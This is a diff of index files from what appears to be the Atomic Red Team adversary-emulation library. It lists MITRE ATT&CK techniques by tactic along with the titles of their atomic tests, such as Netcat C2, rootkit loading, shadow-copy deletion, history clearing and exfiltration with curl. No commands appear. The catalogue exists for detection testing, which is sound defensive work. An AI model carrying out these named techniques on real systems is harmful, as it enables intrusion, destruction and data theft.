- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #27: Linux Download File and Run [linux]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# reconnaissance
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1592.001 Gather Victim Host Information: Hardware](../../T1592.001/T1592.001.md)
- Atomic Test #1: Enumerate PlugNPlay Camera [windows]
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
# exfiltration
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
- Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
atomics/Indexes/Indexes-Markdown/linux-index.md
-704
View File
@@ -1,704 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
